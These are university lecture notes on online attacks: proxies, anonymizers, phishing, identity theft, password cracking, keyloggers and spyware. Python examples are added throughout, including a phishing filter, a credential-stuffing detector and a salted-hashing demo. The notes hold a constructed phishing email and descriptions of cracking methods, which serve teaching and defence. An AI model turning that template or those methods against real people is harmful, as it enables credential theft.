Cyber and Network Security Unit 3

KNOWN ABOUT ONLINE ATTACKS

CYBER AND NETWORK SECURITY
UNIT-3
By: Rupanshi Patidar
Assistant Professor
Cybercrime Investigation Tools
• Cybercrime investigation requires the use of specialized tools and software to collect, preserve, and analyze digital evidence. These tools can be used to identify suspects, track their activities, and gather evidence to build a case against them.
Here are some of the most common cybercrime investigation tools used by investigators:
1. Digital Forensics Software
• It is used to recover deleted files, analyze metadata, and examine network traffic logs. Popular digital forensics software includes tools like EnCase, FTK, and Autopsy.
2. Network Analysis Tools
• They are used to monitor network traffic, identify suspicious activity, and track the flow of data. Network analysis tools include Wireshark, tcpdump, and Netscout.
3. Malware Analysis Tools
• They are used to analyze and reverse engineer malware to understand its behavior and identify its source. Malware analysis tools include IDA Pro, OllyDbg, and Binary Ninja.
4. Password Recovery Tools
• They are used to recover passwords from encrypted files, databases, or other sources of digital evidence. Password recovery tools include Cain and Abel, John the Ripper, and Hashcat.
5. Social Media Analysis Tools
• They are used to track suspects' activities and gather evidence from social media platforms. Social media analysis tools include Hootsuite, Followerwonk, and Mention.
Proxy Servers
• A proxy server is an intermediate server that sits between a user's device and the internet. When a user makes a request to access a website, the request first goes to the proxy server, which then forwards the request to the website. The website's response is sent back to the proxy server, which then sends it back to the user's device.
• It works as a gateway between the end-user and the internet. It has its own IP address. It separates the client system and web server from the global network.
• In other words, we can say that the proxy server allows us to access any website with a different IP address. It plays an intermediary role between users and targeted websites or servers. It collects and provides information related to user requests. The most important point about a proxy server is that it does not encrypt traffic.
• The proxy server accepts the request from the client and produces a response based on the following conditions:
  • If the requested data or page already exists in the local cache, the proxy server itself provides the required retrieval to the client.
  • If the requested data or page does not exist in the local cache, the proxy server forwards that request to the destination server.
  • The proxy server transfers the reply to the client and also caches it for later requests.
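The three conditions above, implemented as a small caching forward proxy. This is an added example, not code from the slides: the origin is a constructed in-memory function so it runs offline, the clock is injectable so cache expiry can be shown, and the `forwarded` list records exactly what the proxy operator sees in cleartext, which is the slides' point that a plain proxy does not encrypt traffic.

```python
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple


@dataclass
class CachedReply:
    body: str
    stored_at: float          # seconds, from the proxy's clock


@dataclass
class CachingProxy:
    # Hypothetical origin fetcher (url -> body); a real proxy would open a socket to the site.
    origin: Callable[[str], str]
    ttl_seconds: float = 60.0                 # how long a cached page counts as fresh
    clock: Callable[[], float] = time.time    # injectable so a demo can age the cache by hand
    cache: Dict[str, CachedReply] = field(default_factory=dict)
    # Every (client_ip, url) the proxy forwarded. Nothing here is encrypted: the proxy
    # operator sees each user's requests and the pages that come back.
    forwarded: List[Tuple[str, str]] = field(default_factory=list)

    def fetch(self, client_ip: str, url: str) -> Tuple[str, str]:
        """Serve one client request; returns (where_it_came_from, body)."""
        now = self.clock()
        hit = self.cache.get(url)
        # Condition 1: page already in the local cache (and still fresh) -> answer directly.
        if hit is not None and now - hit.stored_at < self.ttl_seconds:
            return "cache", hit.body
        # Condition 2: not cached (or stale) -> forward to the destination on the client's behalf.
        # The destination sees the proxy's address, not the client's.
        self.forwarded.append((client_ip, url))
        body = self.origin(url)
        # Condition 3: relay the reply to the client and keep a copy for later requests.
        self.cache[url] = CachedReply(body=body, stored_at=now)
        return "origin", body


# Constructed, offline "internet": two pages served by a fake origin.
FAKE_SITES = {
    "http://example.test/index.html": "<html>welcome</html>",
    "http://example.test/login": "<html>login form</html>",
}


def run_demo() -> dict:
    """Two clients share one proxy; shows hit/miss behaviour and cache expiry."""
    fake_time = [1_000.0]                      # mutable clock the demo advances by hand
    proxy = CachingProxy(origin=FAKE_SITES.__getitem__, ttl_seconds=30.0,
                         clock=lambda: fake_time[0])
    sources = []
    sources.append(proxy.fetch("10.0.0.5", "http://example.test/index.html")[0])  # miss  -> origin
    sources.append(proxy.fetch("10.0.0.6", "http://example.test/index.html")[0])  # hit   -> cache
    sources.append(proxy.fetch("10.0.0.6", "http://example.test/login")[0])       # miss  -> origin
    fake_time[0] += 31.0                                                            # age past the TTL
    sources.append(proxy.fetch("10.0.0.5", "http://example.test/index.html")[0])  # stale -> origin
    return {"sources": sources, "forwarded": list(proxy.forwarded),
            "cached_urls": sorted(proxy.cache)}


if __name__ == "__main__":
    print(run_demo())
```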
Types of Proxy Servers
• Forward Proxy - A forward proxy is a server that sits between a client and the internet. The client sends a request to the forward proxy, which then sends the request to the internet on behalf of the client.
• Reverse Proxy - A reverse proxy is a server that sits between the internet and a server. The reverse proxy receives requests from the internet and then forwards those requests to the appropriate server. The most popular reverse proxies are Varnish and Squid.
• Transparent Proxy - A transparent proxy is a proxy that does not modify the request or response, but simply passes the traffic along. Transparent proxies are often used in corporate environments to monitor and control access to the internet.
• Non-Transparent Proxy: It is an intermediary that modifies the request or response in order to offer some extra services to the client. Web requests are sent directly to the proxy regardless of the server from which they originated.
• Anonymous Proxy - An anonymous proxy is a proxy that conceals the user's IP address, providing an additional layer of privacy.
• Shared Proxy: A shared proxy server is used by more than one user at a time. It provides an IP address to the client that can be shared with other clients. It also allows users to select the location from which they want to search. It is ideal for users who do not want to spend a lot of money on a fast connection. Low cost is its advantage. Its disadvantage is that a user can get blamed for someone else's mischievous activity; for this reason, the user can be blocked from the site.
• HTTP Proxy: HTTP proxies are proxy servers that are used to save cached copies of the browsed websites. This saves time and enhances speed because cached files reside in local memory. If the user wants to access the same file again, the proxy itself provides the file without actually browsing the pages.
• Data Center Proxy: It is a special type of proxy that is not affiliated with an ISP. It is provided by other corporations through a data center. These servers can be found in physical data centers. It is ideal for clients who want quick responses. It does not provide high-level anonymity; for this reason, it can put client information at high risk.
• DNS Proxy: A DNS proxy takes requests in the form of DNS queries and forwards them to the domain server, where they can also be cached; moreover, the flow of requests can also be redirected.
• Rotating Proxy: A rotating proxy assigns a new or different IP address to each user that connects to the proxy. As users connect, a unique address is assigned to each of them.
• Tor Onion Proxy: This server aims at online anonymity for the user's personal information. It is used to route traffic through various networks present worldwide to make it difficult to track the user's address and to prevent attacks based on any anonymous activities. It makes it difficult for anyone who is trying to track the original address. In this type of routing, the information is encrypted in multiple layers. At the destination, each layer is decrypted one by one so that the information is not scrambled and the original content is received. This software is open-source and free of cost to use.
Anonymizers
• An anonymizer is a proxy server that makes Internet activity untraceable. An anonymizer protects personally identifying information by hiding private information on the user's behalf. An anonymizer or an anonymous proxy is a tool that attempts to make activity on the Internet untraceable. It is a proxy server computer that acts as an intermediary and privacy shield between a client computer and the rest of the Internet. It accesses the Internet on the user's behalf, protecting personal information by hiding the client computer's identifying information.
There are several different types of anonymizers, including:
• VPN - A Virtual Private Network (VPN) is a type of anonymizer that creates an encrypted connection between the user's device and the internet. All traffic between the device and the internet is routed through the VPN, which conceals the user's IP address and provides an additional layer of security.
• TOR - The Onion Router (TOR) is a free software program that is used to conceal a user's online activity by routing their traffic through a network of servers. TOR is designed to be extremely difficult to trace, making it a popular choice for users who need to conceal their identity.
• Web-based anonymizers - Web-based anonymizers are online tools that allow users to browse the internet without revealing their IP address. These tools work by routing traffic through a third-party server, making it difficult for websites to track the user's online
Benefits of Anonymizers
• Anonymizers can provide users with a layer of privacy when accessing the internet, helping to conceal their online activity from prying eyes.
• Anonymizers can help protect users from malware, viruses, and other types of attacks by creating an encrypted connection between the user's device and the internet.
• Anonymizers can be used to access content that may be blocked or restricted in certain locations, such as geo-restricted content or websites that may be blocked by government or institutional firewalls.
• Anonymizers can help protect a user's identity and personal information from being tracked and monitored by third parties, such as advertisers or hackers.
• Anonymizers can also provide improved performance when browsing the internet, as they can reduce load times for certain types of content and reduce bandwidth usage.
Phishing
• A phishing attack is when someone deliberately tries to obtain your username and password to use them in a malicious way. These individuals want your username and password to send spam or, more seriously, to infiltrate the University's network. Do not be tricked into giving away your username or password.
• Most phishing is conducted by email. Some attacks are pretty obvious. For example, "Your mail box is over quota, please reply to this email including your username and password to get more quota". Or you may be provided with a 'link' in an email that takes you to a form that asks for your username and password.
Example of phishing email
• A few characteristics give away that this is a good example of a phishing email. They are:
  • The recipient is addressed as 'Dear User'. This email is sent by someone who has no idea who you are. The University, when it sends email to students, will know who you are, and will not use 'Dear User' instead of your name.
  • Incorrect capitals in the first sentence: the phrase 'Very Important' is capitalised and placed just before the 'Click here' link to provide a sense of urgency to click the link.
  • The University does not need you to click on links to enable 'mail management and Virus Scanning'.
  • Spelling errors. The space between 'terminated' and 'in' is missing.
  • The use of phrases like 'failure to adhere to our urgent notice' is pretty characteristic of a phishing attempt.
  • The mail is not signed by a person.
What to look out for in phishing scams
1. Deals and offers that are too good to be true.
2. Unknown or unusual senders.
3. Hyperlinks and attachments.
4. Web address spelled incorrectly.
5. Immediate pop-ups.
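The giveaways listed above (generic greeting, urgency wording, a 'Click here' link to a look-alike address, an unknown sender, no human signature) turned into a simple mail-filter rule set. This is an added example, not code from the slides: the two messages are constructed, `example-university.edu` stands in for the University's real sending domain, and the look-alike domains in the phishing sample are placeholders.

```python
import re

# Rules distilled from the giveaways listed in the slides (constructed, illustrative patterns).
GENERIC_GREETINGS = ("dear user", "dear customer", "dear account holder")
URGENCY_PHRASES = ("urgent notice", "failure to adhere", "very important",
                   "will be terminated", "immediately", "within 24 hours")
# Assumed allowlist standing in for the domains the University really sends mail from.
TRUSTED_DOMAINS = {"example-university.edu"}

LINK_RE = re.compile(r'<a\s+href="(?P<href>[^"]+)"[^>]*>(?P<text>.*?)</a>', re.I | re.S)
HOST_RE = re.compile(r"^(?:https?://)?([^/:\s]+)", re.I)
# "Regards, Firstname Lastname": a human signature; its absence is one of the slides' giveaways.
SIGNATURE_RE = re.compile(r"(?:[Rr]egards|[Ss]incerely|[Tt]hanks),?\s+[A-Z][a-z]+\s+[A-Z][a-z]+")


def host_of(url: str) -> str:
    """Host part of a URL as written in the mail, lower-cased ('' if unparseable)."""
    m = HOST_RE.match(url.strip())
    return m.group(1).lower() if m else ""


def phishing_indicators(sender: str, body_html: str) -> list:
    """Return the names of the giveaways found in one message (empty list = nothing suspicious)."""
    found = []
    text = " ".join(re.sub(r"<[^>]+>", " ", body_html).split())   # tag-stripped, whitespace-collapsed
    low = text.lower()
    if any(low.startswith(g) for g in GENERIC_GREETINGS):
        found.append("generic greeting")             # 'Dear User': the sender does not know you
    if any(p in low for p in URGENCY_PHRASES):
        found.append("urgency language")             # 'failure to adhere to our urgent notice'
    if sender.rsplit("@", 1)[-1].lower() not in TRUSTED_DOMAINS:
        found.append("sender outside trusted domain")
    for m in LINK_RE.finditer(body_html):
        if host_of(m.group("href")) not in TRUSTED_DOMAINS:
            found.append("link to untrusted host")   # misspelled / look-alike web address
        if "click here" in m.group("text").lower():
            found.append("'click here' link")
    if not SIGNATURE_RE.search(text):
        found.append("not signed by a person")
    return found


# Constructed sample modelled on the slides' example (quota scare, 'Very Important', 'terminatedin').
PHISHING_SENDER = "mailadmin@mail-university-support.com"   # placeholder look-alike domain
PHISHING_BODY = """<p>Dear User,</p>
<p>Your mail box has exceeded its quota and will be terminatedin 24 hours.
Very Important: <a href="http://mail-univesity-support.com/verify">Click here</a>
to enable mail management and Virus Scanning. Failure to adhere to our urgent
notice will result in suspension.</p>
<p>Mail Administrator</p>"""

# Constructed legitimate message for comparison: named recipient, trusted link, signed by a person.
LEGIT_SENDER = "registrar@example-university.edu"
LEGIT_BODY = """<p>Dear Priya Sharma,</p>
<p>Your Unit 3 exam timetable is now available on
<a href="https://example-university.edu/portal">the student portal</a>.</p>
<p>Regards,<br>Anil Mehta<br>Registrar</p>"""


if __name__ == "__main__":
    print("phishing sample:", phishing_indicators(PHISHING_SENDER, PHISHING_BODY))
    print("legitimate sample:", phishing_indicators(LEGIT_SENDER, LEGIT_BODY))
```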
Identity Theft
• Identity Theft, also called Identity Fraud, is a crime that is being committed by a huge number of people nowadays. Identity theft happens when someone steals your personal information to commit fraud. This theft is committed in many ways by gathering personal information, such as another person's transactional information, to make transactions. Identity theft occurs when someone uses another person's personal information, such as name, Social Security number, driver's license number, credit card number etc.
Frequent methods used to steal an identity include:
• Over-sharing personal information on social media, such as birthdays, hometowns, and online resumes.
• Sharing location information via photos, such as geo-tagging and location check-ins.
• Inadvertently revealing personal financial institutions through social media profiles, usually via a "like" or a "favorite."
5 Signs Of Identity Theft
1. Delayed arrival of bills and financial statements. This kind of delay may indicate cyber criminals have changed the mailing address for your accounts or are stealing from your mailbox.
2. Unexpected calls from creditors about outstanding charges and balances on existing accounts or for accounts and charges you did not make.
3. New account confirmation from a bank, credit card company, or online business you are not associated with.
4. Credit card charges and bank account transactions that you did not make.
5. Cancellation notices of utilities or services.
Types of Identity Theft
How to protect yourself from identity theft
• Secure your connection: If you are going to use your personal information online, make sure you do so only when your connection is secure, preferably via a home or corporate network or cellular data. If possible, avoid public Wi-Fi with no password protection. Should you have no other choice, use a virtual private network (VPN) that will encrypt all your communication and thus protect you from eavesdropping criminals.
• Keep your devices secure: Protect your laptop, smartphone and tablet from malicious software and attackers by using a reliable, multi-layered, up-to-date security solution.
How does phishing relate to identity theft?
• Besides crafting emails that look convincing, phishing attacks usually make use of fake websites and a multitude of clever tactics to take the victim's personal and financial information, which can then be used to impersonate the victim.
• For example, if someone received an email from their bank alerting them that their online account has been temporarily suspended due to suspicious behavior, they might panic and attempt to secure their account according to the methods described in the email. The email will usually link the victim to a fake website set up by the attacker to mimic the bank's login page. In that state, they might enter their login credentials as normal without trying to make sure whether the website really belongs to the bank or not. And just like that, the bank account information is sent to the attacker.
• Once cybercriminals have your data, you're a victim of identity theft.
• If they have sufficient information on you, they can use your name, address, or credit card details to fool institutions into thinking that they're acting on your behalf. For example, if they gain enough control of your devices and bank accounts, they can initiate a transfer of funds from your account to theirs without your knowledge (of course, the transfer will be online and made anonymously to avoid detection).
Password Cracking
• Password cracking (also called password hacking) is an attack vector that involves hackers attempting to crack or determine a password for unauthorized authentication. Password hacking uses a variety of programmatic techniques, manual steps, and automation using specialized tools to compromise a password.
• The shorter and simpler your password, the easier it is to crack. An eight-character complex password takes around five minutes to crack, while one with six or fewer characters could be cracked instantly.
How do I know if my password has been cracked?
• Unauthorized access: if you notice unfamiliar or suspicious activity on your accounts or systems, it might indicate a security breach.
• Password change: if you receive notifications about password changes that you didn't initiate, someone may have accessed your account.
• Unsolicited emails or messages: phishing emails or messages sent from your own accounts can be a sign that your password has been compromised.
• Changes to account information: modifications to your account settings without your knowledge, such as email address or recovery options, could be a red flag.
• Unfamiliar devices or locations: if you notice unfamiliar devices or IP addresses in your account activity, it may indicate a security breach.
5 Common password cracking techniques
1. Brute-force attack
2. Dictionary attack
3. Credential stuffing attack
4. Hybrid attack
5. Rainbow table attack
1. Brute-force attack
• In this method, the attacker repeatedly attempts to guess a password by systematically trying every possible character combination until a valid password is found. In this attack, the attacker uses a password-cracking tool that generates a list of possible passwords. The software tool can try different character combinations, including uppercase and lowercase letters, symbols, and numerical digits, and it can also try numerous word and phrase variations that are commonly used as passwords.
• If a password is equivalent to using a key to open a door, a brute force attack is using a battering ram. A hacker can try 2.18 trillion password/username combinations in 22 seconds, and if your password is simple, your account could be in the crosshairs.
2. Dictionary attack
• These attacks are similar to brute-force attacks, but they're less about quantity and more about quality. In other words, instead of trying every possible combination, bad actors start with the assumption that users are likely to follow certain patterns when they create a password. So they will home in on the most likely words rather than trying everything.
• Some users pick easy-to-remember passwords, like "password" or "123abc." Others follow predictable patterns that can vary by region: users might pick words related to their favorite sports teams, local landmarks, city names, and so on.
3. Credential stuffing attack
• With credential stuffing, bad actors take advantage of the tendency for users to reuse the same usernames and passwords for multiple accounts.
• Here's how it works. Pairs of compromised usernames and passwords are added to a botnet that automates the process of trying those credentials on multiple sites at the same time. The purpose of these attacks is to identify account combinations that work and can be re-used across multiple sites.
• If you've suffered a hack in the past, you know that your old passwords were likely leaked onto a disreputable website. Credential stuffing takes advantage of accounts that never had their passwords changed after an account break-in.
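What the pattern described above looks like from the defender's side of the login server, as an added example that is not part of the slides. The log lines and their format are constructed; the detector flags a source that tries many distinct usernames with mostly failures (one IP working through a leaked list) and, separately, a spike in distinct failing accounts across the whole site (a botnet trying each leaked pair once from a different address).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log in an assumed format: "<ISO time> auth src=<ip> user=<name> result=OK|FAIL".
# 203.0.113.5 is a normal user who mistyped once; 198.51.100.7 works through a leaked list
# (one pair succeeds: that account is the one to reset); 192.0.2.x is a botnet trying one pair each.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z auth src=203.0.113.5 user=bob result=FAIL
2024-05-01T10:00:09Z auth src=203.0.113.5 user=bob result=OK
2024-05-01T10:01:00Z auth src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:01:01Z auth src=198.51.100.7 user=carol result=FAIL
2024-05-01T10:01:02Z auth src=198.51.100.7 user=dave result=FAIL
2024-05-01T10:01:03Z auth src=198.51.100.7 user=erin result=OK
2024-05-01T10:01:04Z auth src=198.51.100.7 user=frank result=FAIL
2024-05-01T10:01:05Z auth src=198.51.100.7 user=grace result=FAIL
2024-05-01T10:02:10Z auth src=192.0.2.11 user=heidi result=FAIL
2024-05-01T10:02:11Z auth src=192.0.2.12 user=ivan result=FAIL
2024-05-01T10:02:12Z auth src=192.0.2.13 user=judy result=FAIL
2024-05-01T10:02:13Z auth src=192.0.2.14 user=mallory result=FAIL
2024-05-01T10:02:14Z auth src=192.0.2.15 user=niaj result=FAIL
2024-05-01T10:02:15Z auth src=192.0.2.16 user=olivia result=FAIL
2024-05-01T10:02:16Z auth src=192.0.2.17 user=peggy result=FAIL
2024-05-01T10:02:17Z auth src=192.0.2.18 user=rupert result=FAIL
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) auth src=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<res>OK|FAIL)$")


def parse(log_text: str) -> list:
    """Turn log text into (timestamp, ip, user, success) tuples, skipping non-auth lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["ip"], m["user"], m["res"] == "OK"))
    return events


def detect_credential_stuffing(log_text: str, window_minutes: int = 10,
                               min_users_per_ip: int = 5, min_fail_ratio: float = 0.8,
                               distinct_fail_users_alarm: int = 10) -> dict:
    """Two signals over the last `window_minutes` of the log (thresholds are assumed)."""
    events = parse(log_text)
    if not events:
        return {"stuffing_ips": [], "distributed_spray": False, "failing_users": 0}
    end = max(e[0] for e in events)
    start = end - timedelta(minutes=window_minutes)
    recent = [e for e in events if start <= e[0] <= end]

    per_ip = defaultdict(lambda: {"attempts": 0, "fails": 0, "users": set()})
    failing_users = set()
    for _ts, ip, user, ok in recent:
        s = per_ip[ip]
        s["attempts"] += 1
        s["users"].add(user)
        if not ok:
            s["fails"] += 1
            failing_users.add(user)

    # Signal 1: one source, many different accounts, almost all failing. A real user retrying
    # a mistyped password hits one account, so the distinct-user count separates the two.
    stuffing_ips = sorted(ip for ip, s in per_ip.items()
                          if len(s["users"]) >= min_users_per_ip
                          and s["fails"] / s["attempts"] >= min_fail_ratio)
    # Signal 2: the botnet case. No single IP stands out, but the number of distinct
    # accounts seeing a failed login in the window is far above normal.
    return {"stuffing_ips": stuffing_ips,
            "distributed_spray": len(failing_users) >= distinct_fail_users_alarm,
            "failing_users": len(failing_users)}


if __name__ == "__main__":
    print(detect_credential_stuffing(SAMPLE_LOG))
```

The successful login for `erin` from the flagged address is the attack's actual result: the response is to reset that account's password and invalidate its sessions, not just to block the IP.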
4. Hybrid attack
• When users change their password, they'll often add a few extra numbers, letters or characters at the end. Hybrid attacks take advantage of this tendency.
• Often, hybrid attacks are a mix of dictionary attacks and brute force. In this case, a bad actor may get a user's compromised password for one site. The user learns it has been compromised and changes it. The attacker will now try out variations of the old password using a brute force method that automates the additions of numbers, letters and more.
• While this method is more time-consuming than a simple dictionary attack, it's faster than a brute-force attack.
5. Rainbow table attack
• To keep passwords safe, any responsible organization that stores passwords won't keep them in their original plaintext form. Rather, they use a hashing algorithm to convert passwords into a string of seemingly random letters and numbers.
• But there are only a limited number of hashing algorithms. And they hash the same passwords the same way every time. As a result, attackers can develop databases of common passwords that they've been able to decode. Once they have deciphered a password, they store it in a database called a rainbow table.
• When an attacker gets a new hashed password, they check to see if it matches any of the precomputed hashes stored in their rainbow table. The downside to rainbow tables is that they take considerable time and effort to create. And they often don't work on passwords that have been salted.
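Why a precomputed table works against unsalted hashes and fails against salted ones, shown with Python's standard library. This is an added example, not code from the slides: the "table" is a constructed plain lookup over a handful of common passwords (a real rainbow table stores hash chains, but it relies on the same property, that one password always produces one hash), and the salted side uses PBKDF2-HMAC-SHA256 with a random per-user salt.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a rainbow table: hash -> password for a few very common passwords.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein", "password123"]
ITERATIONS = 200_000   # PBKDF2 work factor (assumed value; raise it as hardware gets faster)


def unsalted_hash(password: str) -> str:
    """The weak scheme: same password, same hash, for every user and every site."""
    return hashlib.sha256(password.encode()).hexdigest()


PRECOMPUTED = {unsalted_hash(p): p for p in COMMON_PASSWORDS}


def lookup_precomputed(stored_hash: str):
    """Whoever holds a stolen unsalted hash needs only one dictionary lookup."""
    return PRECOMPUTED.get(stored_hash)


def salted_hash(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """Per-user random salt plus many iterations: no table can be built ahead of time."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def make_record(password: str) -> dict:
    """What the server stores: salt, iteration count and derived key. Nothing else is needed."""
    salt = os.urandom(16)
    return {"salt": salt, "iterations": ITERATIONS, "hash": salted_hash(password, salt)}


def verify(password: str, record: dict) -> bool:
    """Recompute with the stored salt; compare in constant time to avoid a timing side channel."""
    candidate = salted_hash(password, record["salt"], record["iterations"])
    return hmac.compare_digest(candidate, record["hash"])


def demo() -> dict:
    """Same password stored two ways; shows what the precomputed table can and cannot do."""
    stolen_unsalted = unsalted_hash("password123")
    rec_a = make_record("password123")
    rec_b = make_record("password123")        # a second user who chose the same password
    return {
        "precomputed_hit": lookup_precomputed(stolen_unsalted),               # 'password123'
        "same_password_same_hash_unsalted": unsalted_hash("password123") == stolen_unsalted,
        "same_password_same_hash_salted": rec_a["hash"] == rec_b["hash"],    # False: salts differ
        "precomputed_hit_on_salted": lookup_precomputed(rec_a["hash"].hex()),  # None
        "verify_ok": verify("password123", rec_a),
        "verify_wrong": verify("Password123", rec_a),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```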
Tips to protect your organization against password attacks
• Create strong password policies. Users don't typically have the best password hygiene. Consider a password policy that requires a minimum passphrase length (ideally greater than 20 characters), requires the use of special characters, and forces users to reset their passwords regularly.
• Use multifactor authentication. When MFA is used, password cracking is mostly neutralized (though a growing number of attacks employ MFA-bypass techniques). An attacker might figure out a user's password, but in many cases, they still won't have access to the secondary authentication method.
• Encrypt, hash and salt passwords. Both encrypting and hashing exponentially increase the effort and the computing power that's required for attacks. And salting makes the process even harder.
• Update systems regularly. When systems aren't updated, malware that tracks users' keystrokes can infect emails, files and applications. In these so-called keystroke attacks, bad actors gather user credentials and other sensitive information. Updated systems can prevent these attacks.
Keylogger
• Imagine if someone had access to everything you type. While it can sometimes be done legally, keylogging is a form of data monitoring used to surreptitiously acquire people's personal information.
• A keylogger (or keystroke logger) is a type of spyware that monitors and records what you type on your computer or mobile phone. Keylogging software or hardware can be used to monitor activity for legal or illegal purposes.
• Keystroke malware can be delivered in a number of ways:
  • Phishing emails: By clicking a link or downloading an attachment in a phishing email, text message, instant message, or social media post, you could accidentally download malware designed to track keystrokes.
  • Trojan viruses: Named after the giant wooden horse that the Greeks used to infiltrate Troy during the Trojan War; hackers trick users into downloading a Trojan virus by disguising it as a legitimate file or application.
  • Zero-day exploit: A zero-day exploit happens when hackers discover an existing software security flaw and exploit it. Once developers learn of the vulnerability, it's too late to protect users. These are particularly dangerous because once the systems are infected, they're more susceptible to further attacks.
  • Infected systems: Keyloggers can take advantage of an already-infected device or system and install other malicious software into that system.
Types of Keylogger
• Software Keyloggers: These are software programs or scripts installed on a target system to capture and record keystrokes as users type.
• Hardware Keyloggers: These are hardware devices attached between the keyboard and the computer or embedded within a computer peripheral.
• Memory-Injection Keyloggers: These keyloggers inject malicious code into running processes to capture keystrokes or intercept data.
• Mobile Keyloggers: These target smartphones and tablets, capturing touch inputs and virtual keyboard keystrokes.
• Form Grabbing Keyloggers: These keyloggers target web forms, capturing the data entered by a user before it is encrypted and sent to the server.
• Acoustic Keyloggers: These unique keyloggers use sound to capture keystrokes. By analyzing the sound of typing, attackers can reconstruct what keys were pressed.
How to Detect a Keylogger?
• Indicators that can help to detect keyloggers:
  • Unusual system slowdowns
  • Unexpected increase in network traffic
  • Suspicious behavior of antivirus or security software
  • Unexplained pop-ups or browser redirects
  • Passwords or accounts compromised without reason
  • Exceptional battery drainage on mobile devices
How to Prevent a Keylogger Attack?
Here are some common keylogger prevention tips:
• Use reputable antivirus and anti-malware software
• Enable a firewall to block unauthorized access
• Use a virtual keyboard for sensitive tasks
• Be cautious when using public systems or networks
• Regularly update your operating system and applications
• Implement two-factor authentication for online accounts
• Regularly monitor your accounts for unauthorized activities
• Consider using a hardware-based authentication method
• Educate yourself about phishing and social engineering tactics
• Be cautious about downloading files from untrusted sources or clicking suspicious links or email attachments
How to detect and remove keyloggers
1. Check your software inventory. Successful keystroke logger detection starts with taking stock of the programs and processes running on your computer. While many of these apps may have unfamiliar or even suspicious-looking names, some may blend in with the names of other software and be harder to spot.
2. Check your browser extensions. Some keylogging malware is designed specifically to monitor your web usage and may show up as a browser extension. Check your browser menu and the list of active extensions. If there are any you don't recognize or didn't download, deactivate and remove them.
3. Remove keyloggers: Keyloggers can be removed in much the same way as you would remove other forms of malware. Always exercise caution when handling computer programs. Even if one seems suspicious, it could be a necessary tool, and disabling it could cause problems. If you're certain a program is a keylogger, disable it, uninstall it, and delete it from your device.
4. What to do if you don't find a keylogger: If you fail to identify any malicious keyloggers, you could reinstall your device's operating system or perform a factory reset, which will effectively wipe all the data and programs from your device that were installed over the factory default settings.
Spyware
• Spyware is malicious software that enters a user's computer, gathers data from the device and user, and sends it to third parties without their consent.
• Spyware is one of the most commonly used cyberattack methods that can be difficult for users and businesses to identify and can do serious harm to networks.
• Adware: Malicious adware is often bundled with free software, shareware programs and utilities downloaded from the internet or surreptitiously installed onto a user's device when the user visits an infected website.
• Cookies: Cookies that track and record users' personally identifiable information (PII) and internet browsing habits are one of the most common types of adware. An advertiser might use tracking cookies to track what webpages a user visits in order to target advertising in a contextual marketing campaign.
• Keylogger: Keyboard loggers. Keyloggers are a type of system monitor that cybercriminals often use to steal PII, login credentials and sensitive enterprise data. Employers may also use keyloggers to observe employees' computer activities; parents to supervise their children's internet usage; device owners to track possible unauthorized activity on their devices; or law enforcement agencies to analyze incidents involving computer use.
• Trojans: Trojans are typically malware programs that are disguised as legitimate software. A victim of a Trojan could unknowingly install a file posing as an official program, enabling the Trojan to access the computer. The Trojan can then delete files, encrypt files for ransom or enable other malicious actors to have access to the user's information.
Mobile Spyware
• Mobile spyware is dangerous because it can be transferred through Short Message Service or Multimedia Messaging Service text messages and typically does not require user interaction to execute commands. When a smartphone or tablet gets infected with mobile spyware that is sideloaded with a third-party app, the phone's camera and microphone can be used to spy on nearby activity, record phone calls, and log browsing activity and keystrokes. The device owner's location can also be monitored through the Global Positioning System (GPS) or the mobile computing device's accelerometer.
How do you remove spyware?
• If users determine that spyware has infected the system, they should perform the following steps:
1. Disconnect the internet connection.
2. Check the device's programs list to see if the unwanted software is listed. If it is, choose to remove it from the device. After uninstalling the program, reboot the entire system.
3. If the above step does not work, run a scan of the system using reputable antivirus software. The scan should find suspicious programs and ask the user to either clean, quarantine or delete the software.
4. The user can also download a virus removal tool or antispyware tool and allow it to run through the system.
• If none of the above steps work, then the user will have to access the device's HD in safe mode. However, this requires a tool that enables the user to access the spyware folders and manually delete them. While this sounds complicated, the process should only take a few minutes.
Antispyware tools
• Malwarebytes is an antimalware and spyware tool that can remove spyware from Windows, macOS, Chrome OS, Android and iOS. Malwarebytes can scan through registry files, running programs, HDs and individual files. Once a spyware program is detected, a user can quarantine and delete it. However, users cannot set up automatic scanning schedules.
• Trend Micro HouseCall is another antispyware tool that does not require user installation, so it uses minimal processor and memory resources and disk space. However, like Malwarebytes, users cannot set automatic scans.
• Windows Defender is a Microsoft antimalware product that is included in the Windows 10 OS under Windows Defender Security Center. The software is a lightweight antimalware tool that protects against threats such as spyware, adware and viruses. Windows Defender includes features such as protection against phishing sites, real-time threat detection and parental controls. Windows Defender users can set automatic quick and full scans, as well as set alerts for low, medium, high and severe priority items.
What are common examples of spyware?
• CoolWebSearch uses security vulnerabilities found in Internet Explorer to take control, change settings and send browsing information to spyware authors.
• DarkHotel is a targeted spear phishing spyware that selectively attacks business hotel visitors through the hotel's Wi-Fi network.
• Emotet was one of the most prevalent threats in the 2010s. It acted as a Trojan that stole banking credentials from its victims.
• Gator is commonly found in file sharing software. It monitors a victim's web browsing habits to present the user with better-targeted ads.
• TIBS Dialer disconnects the user's computer from local phone lines and connects it to a toll number designed for accessing illegal websites.
• Zlob downloads itself onto a computer to record keystrokes and search a user's browsing history.
Virus
• Virus stands for Vital Information Resources under Siege. It refers to the type of malicious software or malware that can cause damage to your data, files, and software through replication.
• A computer virus is a program that spreads by first infecting files or the system areas of a computer or network router's hard drive and then making copies of itself. Some viruses are harmless, others may damage data files, and some may destroy files. Viruses used to be spread when people shared floppy disks and other portable media; now viruses are primarily spread through email messages.
• Unlike worms, viruses often require some sort of user action (e.g., opening an email attachment or visiting a malicious web page) to spread.
What do viruses do?
